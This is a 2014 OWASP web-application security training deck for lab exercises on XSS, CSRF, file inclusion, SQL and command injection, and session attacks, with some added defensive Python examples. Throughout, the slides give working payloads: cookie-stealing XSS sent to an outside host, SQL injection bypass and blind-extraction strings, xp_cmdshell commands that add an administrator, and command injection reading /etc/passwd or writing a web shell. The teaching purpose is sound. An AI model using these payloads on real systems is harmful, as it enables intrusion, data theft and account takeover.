OWASP San Diego Training Presentation
OWASP San Diego Training Slides from May, 2014

    Presentation Transcript

    • <script> alert('OWASP Training'); </script>
    • Warning: This Presentation Is Intended For Educational Purposes Only
    • Topics: Setup, Web Communication, SQL Basics, HTTP/HTTPS Overview, Tools, Other related technologies, XSS, CSRF, URL Redirect, Local File Inclusion (LFI), Remote File Inclusion (RFI), Direct Object Access, SQL Injection, Command Injection, Javascript Server Side Injection
    • Kali Linux Firefox plugins ◦ Web Developer ◦ User-Agent Switcher ◦ Firebug ◦ SOA Client Setup Check
    • Setup https://172.17.0.42/dvwa/ Username: admin Password: ***** Exercise - DVWA Portal
    • Basic Web Communication
    • Client → Server Client sends a request Server sends back a response E.g. Web Browser → Web Server (Port 80) ◦ Web Server → Postgres Database to fetch data ⚫Returns data to Web Server to process and render to Web Browser Basic Web Communication
    • Web Request Basic Web Communication GET / HTTP/1.1 Host: api.bonfire-project.eu:444 Accept: */* Authorization: Basic XXX Accept-Encoding: gzip, deflate
    • Web Response Basic Web Communication HTTP/1.1 200 OK Vary: Authorization,Accept Transfer-Encoding: chunked Etag: "fa2ba873343ba638123b7671c8c09998" Content-Type: application/vnd.bonfire+xml; charset=utf-8 Date: Wed, 01 Jun 2011 14:59:30 GMT Server: thin 1.2.11 codename Bat-Shit Crazy Allow: GET,OPTIONS,HEAD Cache-Control: public,max-age=120 Connection: close <?xml version="1.0" encoding="UTF-8"?> <root xmlns="http://api.bonfire-project.eu/doc/schemas/occi" href="/"> <version>0.8.9</version> <timestamp>1306940370</timestamp> <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/> <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/> <link rel="users" href="/users" type="application/vnd.bonfire+xml"/> </root>
    • Example using Burpsuite (Repeater)… DEMO - Request/Response
    • GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS HTTP Methods
    • 100 (Informational) 200 (Success) 300 (Redirect) 400 (Client Error) 500 (Server Error) HTTP Response Codes
    • http://www.victim.com/page.aspx?parameter1=test&parameter2=test#location=3 HTTP URI/URL
    • Database communication Web Server communicates to DB to fetch data SQL or a SQL abstraction layer is used SQL = Structured Query Language Basic Web Communication
    • Example Relational SQL DB
    • SELECT INSERT UPDATE DELETE Types Of SQL Statements
    • SELECT column_name FROM table_name WHERE column_name="value" ORDER BY column_name DESC SELECT "random string" SELECT "random string" FROM DUAL SeLeCt Price where ISBN_NO = '0201703092'; SELECT Statement
    • Weak Passwords Open Directories Client Side Security Detailed Error Messages Insecure Configuration
    • https://172.17.0.145/Web2/ Client-Side Security - Exercise https://172.17.0.145/CrackGomezsPassword/ Demo… EXERCISE – Insecure config.
    • HTTPS Communication
    • SSL/TLS Versions: SSLv2, SSLv3, TLS1.0, TLS1.1, TLS1.2 Key Exchange Mechanisms: RSA, DH, DHE/EDH, ECDHE, … Authentication Mechanisms: RSA, … Encryption Algorithms: RC4, DES, AES, IDEA, SEED, … Encryption Modes: CBC, ECB, GCM, Counter, … HTTPS Overview
    • HTTPS = HTTP over TLSv1.0, TLSv1.2 or SSLv3 (* = optional message) CLIENT SERVER ClientHello -----> [ServerHello, Certificate*, ServerKeyExchange*, CertificateRequest*] <----- Certificate*, ClientKeyExchange, CertificateVerify* -----> <----- Finished Application Data <-----> Application Data HTTPS Overview
    • HTTPS Overview
    • HTTPS Overview
    • Burpsuite
    • Demo/Exercise Burpsuite
    • Web Developer Toolbar
    • Firebug
    • IE Developer Toolbar (F12)
    • User Agent Switcher
    • Download user agent xml list ◦ http://techpatterns.com/forums/about304.html User Agent Switcher
    • SOA Client
    • XML HTTP Request (XHR) ◦ XML HTTP header JavaScript Object Notation (JSON) ◦ Way of representing data ◦ { "Firstname": "Jake", "lastname": "Jones" } SOAP ◦ Look for asmx files or asmx?WSDL ◦ Could be server to server or client to server REST ◦ Parameters specified in url ◦ If you don't have documentation you can try and guess the REST parameters Other HTTP Related Technologies
    • Reflected XSS Stored XSS Dom Based XSS Cross-Site Scripting (XSS)
    • http://192.168.1.124/WackoPicko/pictures/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0 Reflected XSS can be in POST Reflected XSS
    • Can be in user agent Could be in cookie Used to be able to control a lot of HTTP headers in Flash Reflected XSS
    • HTML and/or JavaScript is stored on the server and can later be accessed by a user Stored XSS
    • User input is gathered by javascript and reflected back to the page Try exploits with IE (or safari mobile…) Dom Based XSS
    • Put canary value in http://victim.com/id=yoyoyo Use web developer toolbar to view generated source Check to see where the canary is in the source Check to see if html encoding is being used or what characters are available ◦ http://victim.com/id=yoyoyo< Sploit if possible Finding XSS
    • <script>var+i=new+Image;+i.src="http://192.168.1.120"%2bdocument.cookie;</script> <SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIPT> Exploiting XSS Vulns
    • Host XSS javascript files or resources on Apache Server Or start python server ◦ python -m SimpleHTTPServer SimpleHTTPServer can be easily wrapped using ssl library in python Exploiting XSS Vulns
    • Browser Exploitation Framework (BeEF) Exploiting XSS Vulns
    • HTMLEncode All Output Be careful where user output is placed in HTML ◦ <html>HTML encoding won't save you here<script src=http://[user_controlled_input]></script></html> Do NOT write user input into the JavaScript section of a page XSS Defense
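The two cases on the XSS Defense slide side by side, as an added example (not code from the slides): HTML encoding is sufficient in a text node, but in a script-src attribute a plain URL survives encoding untouched, so that context needs an allowlist. The ALLOWED_SCRIPT_HOSTS value is an assumption.

```python
import html
from urllib.parse import urlsplit

# Assumption (constructed value): the only host our pages may load scripts from.
ALLOWED_SCRIPT_HOSTS = {"static.example.org"}


def render_text(user_input):
    """Text node context: HTML-encode everything, quotes included."""
    return "<p>" + html.escape(user_input, quote=True) + "</p>"


def encode_only_script_src(user_input):
    """What the slide warns against: encoding alone in a script-src context.
    A plain URL contains nothing html.escape changes, so it still loads."""
    return '<script src="' + html.escape(user_input, quote=True) + '"></script>'


def render_script_src(user_input):
    """Hardened form: the value must parse as https and point at a host we
    control; encoding is still applied so the attribute cannot be broken out of.
    Returns None when the value is rejected (scheme-relative //host included)."""
    parts = urlsplit(user_input)
    if parts.scheme != "https" or parts.netloc not in ALLOWED_SCRIPT_HOSTS:
        return None
    return encode_only_script_src(user_input)
```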
    • https://172.17.0.42/dvwa/ XSS Reflect exercise EXERCISE - XSS
    • Request on behalf of attacker https://victim.com/change_password.asp?username=admin&password=mypassword123 If tokens are not random they can be guessed or bruteforced CSRF can be in GET or POST Cross Site Request Forgery (CSRF)
    • CSRF Tokens ◦ Generate random tokens ◦ Make sure you check your tokens ☺ CSRF Defense
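Both halves of the CSRF Defense slide (random token, and actually checking it) in one handler, as an added example that is not part of the slides. The in-memory session store and the change-password handler are assumptions standing in for a real framework.

```python
import hmac
import secrets

# Assumption (constructed): session_id -> session data, in place of a real store.
SESSIONS = {}


def new_session():
    """Create a session with an unguessable per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server embeds in its own forms for this session."""
    return SESSIONS[sid]["csrf_token"]


def verify_csrf(sid, submitted):
    """Reject when the session is unknown, the token is missing, or it differs.
    compare_digest keeps the comparison constant-time."""
    session = SESSIONS.get(sid)
    if session is None or not submitted:
        return False
    return hmac.compare_digest(session["csrf_token"], submitted)


def handle_change_password(sid, form):
    """Hypothetical handler for the slide's change_password.asp request."""
    if not verify_csrf(sid, form.get("csrf_token")):
        return "403 forbidden"
    # the real password change would happen here
    return "200 ok"
```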
    • https://victim.com/login.asp?landing_page=/user.asp https://victim.com/login.asp?landing_page=http://www.google.com URL Redirect
    • If you can’t use http try https If you can’t use http or https try //google.com URL Redirect
    • Redirecting to other pages within the site can still be considered a vulnerability For example, when combining the attack with other attacks like XSS, CSRF, out of band SQL injection, or command injection https://victim.com/login.aspx?page=user.aspx?param=<script>alert(1)</script> URL Redirect
    • URL Redirect can be used to steal session information in the URL by analyzing the Referer header https://victim.com/login?page=http://attacker.com https://victim.com/login?page=http://attacker.com&jsessionId=AB21CF40A3BD698 URL Redirect
    • Store location of redirect(s) on the server Create whitelist of possible URLs to redirect to URL Redirect
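The two defences on the URL Redirect slide, as an added example (not from the slides): an allowlist check that rejects the http://, https:// and //google.com forms shown earlier, and a server-side redirect table keyed by id. The allowed pages and the table contents are assumptions.

```python
from urllib.parse import unquote, urlsplit

# Assumptions (constructed): local pages a login may land on, and the
# server-side table used when the redirect is referenced by id instead of URL.
ALLOWED_LANDING_PAGES = {"/", "/user.asp", "/account.asp"}
REDIRECT_TABLE = {"1": "/user.asp", "2": "/account.asp"}


def safe_landing_page(value, default="/"):
    """Allowlist check for a landing_page parameter.
    Returns the path to redirect to, or the default when the value is rejected."""
    decoded = unquote(value)
    parts = urlsplit(decoded)
    # Any scheme or host means an off-site redirect: http://, https:// and the
    # scheme-relative //host form all set scheme or netloc here.
    if parts.scheme or parts.netloc:
        return default
    # Browsers treat a backslash like a slash, so /\host would also escape.
    if "\\" in decoded:
        return default
    # Exact match on the path only: query string and fragment are dropped, so a
    # chained payload such as ?page=user.aspx?param=<script>... is not forwarded.
    return parts.path if parts.path in ALLOWED_LANDING_PAGES else default


def redirect_by_id(redirect_id, default="/"):
    """Preferred form: the client sends an id, the server owns the URL."""
    return REDIRECT_TABLE.get(redirect_id, default)
```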
    • PHP functions ◦ include() ◦ include_once() ◦ require() ◦ require_once() ◦ fopen() Local File Inclusion
    • ../../../../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini ..\..\..\..\..\..\..\..\boot.ini .././.././.././.././.././../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd Local File Inclusion
    • Typically Java and .NET LFI vulns will not allow access outside of web root folder Instead of trying ../../../../../../../../../../../etc/passwd first try ../index.jsp or ../../scripta.js Local File Inclusion
    • Harden php.ini file and other configuration files Make sure web directories are not writable Don’t trust user input for file operations LFI Defense
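An added example of the LFI Defense slide's last bullet (not code from the slides): a path resolver that decodes and normalizes the traversal forms listed two slides earlier and refuses anything that leaves the web root, next to the stronger allowlist lookup. WEB_ROOT and PAGE_MAP are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Assumption (constructed): the directory include() is allowed to read from.
WEB_ROOT = "/var/www/site/pages"
# Stronger alternative: never use the input as a path, map a name onto a file we chose.
PAGE_MAP = {"home": "home.php", "about": "about.php"}


def resolve_include(user_path, web_root=WEB_ROOT):
    """Decode, normalize, then confirm the result is still under web_root.
    Returns the absolute path or None if the request escapes the root."""
    decoded = user_path
    for _ in range(2):                      # %2e%2e%2f and double-encoded variants
        decoded = unquote(decoded)
    if "\x00" in decoded:                   # null-byte truncation tricks
        return None
    decoded = decoded.replace("\\", "/")    # ..\..\windows\win.ini style
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Prefix test with the separator attached so /var/www/site/pages-old is not
    # accepted as inside /var/www/site/pages. Symlinks inside the root would
    # additionally need os.path.realpath in a real deployment.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def resolve_by_name(page_name):
    """Allowlist lookup: unknown names get nothing, not a file."""
    filename = PAGE_MAP.get(page_name)
    return None if filename is None else posixpath.join(WEB_ROOT, filename)
```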
    • https://172.17.0.42/dvwa/ File Inclusion exercise EXERCISE - LFI
    • Whether to allow the treatment of URLs (like http:// or ftp://) as files. http://victim.com/allow-url-fopen allow_url_fopen = On Whether to allow include/require to open URLs (like http:// or ftp://) as files. http://victim.com/allow-url-include allow_url_include = On Remote File Inclusion
    • Go straight to file Directory listing helps a lot Can use burp intruder Check robots.txt Dirbuster Burp engagement Direct Object Access
    • SQL is standard query language implemented by several organizations MySQL MSSQL Oracle Postgres DB2 SQL Injection
    • Error Union Blind Bypass (eg. Authentication Bypass) Types Of SQL Injection
    • ' " ') ))))))))) ; ' " -- ' or 1=1 -- ' and 1=2 -- %27 %2527 %22 # /**/ ' waitfor delay '0:0:20'-- '+waitfor+delay+'0:0:20'+-- ' (select sleep(20)) -- ' (select pg_sleep(20))-- '/**/(select/**/sleep(20))/**/--%20 or 1=(select benchmark(1000000,MD5('A')))-- convert(varchar,0x7b5d) chr(0xbf).chr(0x27) Triggering SQL Injection
    • Places to try when trying to trigger a SQL injection: ◦ GET parameters ◦ POST parameters ◦ HEAD parameters (Blind injection only) ◦ Cookie ◦ Referer header ◦ Agent ID ◦ SOAP parameters ◦ JSON parameters Try using Burp to defeat client side (javascript) SQL injection protections Triggering SQL Injection
    • admin' or 1=1 -- admin' or '1'='1 admin'/**/or/**/2/**/LiKe/**/2--/**/ SELECT username, password from users WHERE username = 'admin' and password = 'admin'; SELECT username, password from users WHERE username = 'admin' or 1=1 -- ' and password = 'admin' SQL Injection Authentication Bypass
    • https://172.17.0.42/owaspbricks/login-1/ exercise EXERCISE – SQL Injection Auth. Bypass
    • https://172.17.0.42/owaspbricks/login-2/ exercise EXERCISE – SQL Injection Auth. Bypass
    • https://172.17.0.145/Web1/ exercise EXERCISE – SQL Injection Auth. Bypass
    • Errors must be turned on in configuration of database or exceptions in code are not handled properly and are printed back to the user Goal is to make database throw an error message and print back the error message with valuable data in it ERROR Based SQL Injection
    • http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version -- Server Error in '/' Application. Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright © 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. ERROR Based SQL Injection
    • (MSSQL) Get column name http://victim.com/showmovies.aspx?name=rad' having '1'='1 WEBUSERS.UserID Get next column name http://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1 WEBUSERS.Username ERROR Based SQL Injection
    • Error Based SQLi MySQL http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20 XPATH syntax error: '5.1.41-3ubuntu12.6-log' ERROR Based SQL Injection
    • For Oracle Error Based SQL Injection use utl_inaddr.get_host_name() function http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select+sys.database_name+ from+dual)))=1 -- ORA-29257: host MOVIE_DATABASE unknown ORA-06512: at 'SYS.UTL_INADDR' line 4 ORA-06512: at 'SYS.UTL_INADDR' line 35 ORA-06512: at line 1 ERROR Based SQL Injection
    • Sometimes the utl_inaddr.get_host_name() function can produce the following error: ◦ ORA-24247: network access denied by access control list (ACL) The following technique will work regardless of network restrictions/permissions (select%201%20from%20dual%20where%201=1 %20and%201=length(extractvalue(xmltype('<x/>' ),'/$'||(select%20user%20from%20dual)))) ERROR Based SQL Injection
    • Postgres http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)-- ERROR: invalid input syntax for integer “PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)” ERROR Based SQL Injection
    • https://172.17.0.42/dvwa/ → SQL Injection Demo/Exercise – Error based SQL Injection
    • Find columns ◦ ' order by 2 -- Find columns that return data ◦ ' union select 1,2 -- Extract data using column ◦ ' union select 1,@@version -- Union Based SQL Injection
    • https://172.17.0.42/dvwa/ → SQL Injection Demo/Exercise – Union based SQL Injection
    • When entering a sqli trigger you get a generic error or redirect (HTTP 200, 302, 500) To confirm the sql injection try using a time based delay ◦ waitfor delay '0:0:20' -- (MS SQL) ◦ benchmark(100000000, rand()),1) -- (MySQL) ◦ select sleep(20) -- (MySQL (version 5.0.12 and later)) ◦ pg_sleep(20) -- (Postgres) ◦ 'a'||Utl_Http.request('http://madeupserver.com') -- (Oracle) ◦ dbms_lock.sleep(20) -- (Oracle (Only DBA, requires plsql injection and doesn’t work in where clause)) Blind SQL Injection
    • Examples of confirming SQL Injection http://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' -- http://victim.com/showmovies.php?name=rad' or 1= (select sleep(20)) --%20 http://victim.com/showmovies.do?name=rad' pg_sleep(20) -- http://victim.com/showmovies.jsp?name=rad' 'a'||Utl_Http.request('http://madeupserver.com') -- Blind SQL Injection
    • Other methods for confirming Blind SQL Injection Try using addition or subtraction ◦ http://victim.com/showmovies.aspx?id=2 ◦ http://victim.com/showmovies.aspx?id=3-1 ◦ http://victim.com/showmovies.aspx?id=1%2b1 Try using a comment ◦ http://victim.com/showmovies.aspx?name=rad' -- ◦ http://victim.com/showmovies.aspx?id=1 /**/ Try a percent sign or a statement that evaluates to true and/or false ◦ http://victim.com/showmovies.aspx?name=% ◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 -- ◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 -- Try string concatenation ◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b'd ◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d ◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd Blind SQL Injection
    • Extracting Data (TRUE or FALSE) http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'-- http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' -- Blind SQL Injection
    • LIKE technique http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'-- (TRUE) (contains 'a') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'-- (TRUE) (contains 'e') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'-- (TRUE) (contains 'o') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'-- (TRUE) (contains 'p') Blind SQL Injection
    • LIKE technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'-- (TRUE) (contains 'r') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'-- (TRUE) (contains 's') http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'-- (TRUE) ( contains 'u' ) http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'-- (TRUE) ( contains 'w' ) http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'-- (TRUE) ( contains '_' ) (aeoprsuw_) Blind SQL Injection
    • LIKE Technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'o') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'ow') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'owa') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'owas') Blind SQL Injection
    • LIKE Technique Continued http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'-- (TRUE) ( starts with 'owasp') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'-- (TRUE) (starts with 'owasp_') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_u') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_us') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_use') http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'-- (TRUE) (user is 'owasp_user') Blind SQL Injection
    • Binary Search Technique http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'-- FALSE Blind SQL Injection
    • Binary Search Technique Continued http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'-- TRUE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'-- FALSE http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'-- TRUE 111 (ASCII (DECIMAL)) First char is o Blind SQL Injection
    • Logical AND (&) Technique (break out the ascii chart) How logical AND operator works ◦ 1 & 1 = 1 ◦ 1 & 0 = 0 ◦ 0 & 1 = 0 ◦ 0 & 0 = 0 ◦ 1100 & 0110 = 0100 This technique will extract one bit at a time (8 requests per byte) Blind SQL Injection
    • Ascii Character 'o' is HEX 6F and binary 0110 1111 Since ascii characters are 128 bits long we will AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010), 1 (0000 0001) If we do a logical AND with each bit and delay a certain number of seconds if the result of the logical AND equals 1 then we should get NO-DELAY, DELAY, DELAY, NO-DELAY DELAY, DELAY, DELAY, DELAY Blind SQL Injection
    • http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay'0:0:20'-- FALSE (NO-Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay'0:0:20'-- FALSE (NO-Delay) Blind SQL Injection
    • http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay'0:0:20'-- TRUE (Delay) http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay'0:0:20'-- TRUE (Delay) Blind SQL Injection
    • The Logical AND technique will take roughly the same number of requests on average as the binary search technique. However, the Logical AND technique does not depend on the previous request (i.e. the requests are idempotent). This means that when using the Logical AND technique multiple requests can be made at the same time. Blind SQL Injection
    • Inference response based blind SQL Injection True or False based on the sites response or response data http://victim.com/search.aspx?id=1' and 1=1 -- (no 500) http://victim.com/search.aspx?id=1' and 1=1/0 -- (500) Blind SQL Injection
    • Oracle timing based SQL Injection (select 'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') -- Blind SQL Injection
    • Heavy Queries http://victim.com/search.aspx?id=1' and (light query) and (heavy query) Blind SQL Injection
    • Demo
    • Execute commands in MSSQL by using xp_cmdshell ' exec sp_configure 'show advanced options',1 -- ' ; RECONFIGURE -- ' exec sp_configure 'xp_cmdshell',1 -- ' ; RECONFIGURE -- ' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' -- ' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' -- Metasploit and Core Impact both have modules for this that could help speed up exploitation and pivoting on a system SQL Injection Operating System
    • MySQL read file from filesystem ◦ select LOAD_FILE('/etc/passwd') MySQL write file to filesystem ◦ select 'this is a test' into outfile '/var/www/test.txt' SQL Injection Operating System
    • Parameterized Queries or Prepared Statements Don’t put user input into Order by clause. Order by clause is not usually supported with parameterized queries ◦ ASC and DESC are only two options. You can use if statement or sort output in javascript ◦ Can grab valid table names or values using a query then check to see if user input matches. Then concatenate with result from query SQL Injection Defense
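The SQL Injection Defense slide worked through on a constructed in-memory SQLite table, as an added example (not code from the slides): the concatenated login that the earlier admin' or 1=1 -- bypass defeats, the parameterized version that treats the same input as a plain string, and the ORDER BY allowlist the slide recommends because the sort column cannot be bound as a parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the users table from the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, created INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "s3cret", 1), ("bob", "hunter2", 2)])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the slide's  admin' or 1=1 --  bypass works here."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Parameterized: the same input is just a (non-matching) string value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Allowlists for the ORDER BY clause: user input selects an entry, it is never
# concatenated into the statement itself.
ORDER_COLUMNS = {"username": "username", "created": "created"}
ORDER_DIRS = {"asc": "ASC", "desc": "DESC"}


def list_users(conn, sort_by="username", direction="asc"):
    """ORDER BY built only from values we wrote ourselves."""
    col = ORDER_COLUMNS.get(sort_by.lower())
    dir_ = ORDER_DIRS.get(direction.lower())
    if col is None or dir_ is None:
        raise ValueError("invalid sort parameter")
    sql = "SELECT username FROM users ORDER BY %s %s" % (col, dir_)
    return [row[0] for row in conn.execute(sql)]
```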
    • https://victim.com/dnslookup.php?dnsentry=google.com https://victim.com/dnslookup.php?dnsentry=google.com;cat%20%2fetc%2fpasswd https://victim.com/dnslookup.php?dnsentry=google.com;cat /etc/passwd https://victim.com/dnslookup.php?dnsentry=blah;&& ls -l Command Injection
    • Commands ◦ google.com; ping -c 20 localhost ◦ google.com & ping -c 20 localhost ◦ google.com && ping -c 20 localhost ◦ google.com && ping -n 20 localhost ◦ google.com && ping -c 20 localhost # ◦ google.com && echo '<php …system(…)..' > /var/www/site/cmd.php Command Injection
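The defensive counterpart to the dnslookup.php examples above, as an added example that is not part of the slides: positive validation of the hostname plus an argv list (no shell), so the ; & && # separators on the Commands slide are never interpreted. The use of the host command is an assumption.

```python
import re
import subprocess

# RFC 1123 hostname shape: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def is_valid_hostname(value):
    """Positive validation: anything that is not a plain hostname is rejected,
    which covers ; & && # and whitespace before they reach any command."""
    return HOSTNAME_RE.match(value) is not None


def vulnerable_command_line(dnsentry):
    """The pattern behind the slide's dnslookup.php: one string handed to a
    shell, so google.com;cat /etc/passwd becomes two commands."""
    return "host " + dnsentry


def safe_command(dnsentry):
    """Hardened form: validated value, argv list, no shell involved."""
    if not is_valid_hostname(dnsentry):
        raise ValueError("not a valid hostname: %r" % dnsentry)
    return ["host", dnsentry]           # assumption: the lookup tool is host(1)


def dns_lookup(dnsentry, timeout=5):
    """Runs the lookup; with an argv list the OS never parses metacharacters."""
    proc = subprocess.run(safe_command(dnsentry), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout
```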
    • https://172.17.0.42/dvwa/ Command Execution EXERCISE – Command Injection
    • Upload a dynamic file (ie. php, asp, aspx, jsp, etc..) Run the dynamic code by going to the file using a web browser ◦ http://victim.com/uploads/shell.php Arbitrary File Upload
    • https://172.17.0.42/dvwa/ → Upload Use: https://172.17.0.144/downloads/ EXERCISE – Arbitrary File Upload
    • Cookie: admin=false Cookie: 139434 Cookie: logged_in=false Burp Sequencer can be used to identify non random cookie variables Session Manipulation and Session Hijacking
    • Padding Oracle Attack POET tool Session Manipulation and Session Hijacking
    • http://victim.com/login.php?SESSID=4v0rmq4gosaag63rla631gl5m2 http://victim.com/login.php?SESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa Send to someone else to automatically set their cookie. Let them login and take over their session Session Fixation
    • Node.js Mongodb (NoSQL with javascript engine) CouchDB (NoSQL with javascript engine) Javascript Server Side Injection
    • POST /test/ HTTP/1.1 Host: 192.168.1.123 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive response.end('pwnd'); Javascript Server Side Injection
    • response.end('<script>alert(1)</script>'); var fs = require('fs'); response.end(fs.readdirSync('c:').toString()); var fs = require('fs'); response.end(fs.writeFileSync('c:\secret.txt', 'littleSecret')); require('child_process').spawn('c:\windows\system32\calc.exe'); response.end('success'); Javascript Server Side Injection
    • NoSQL databases use a key value hashing technique to store data NoSQL databases are not very strict on what data you can insert NoSQL database implementations may or may not implement standard SQL NoSQL Injection
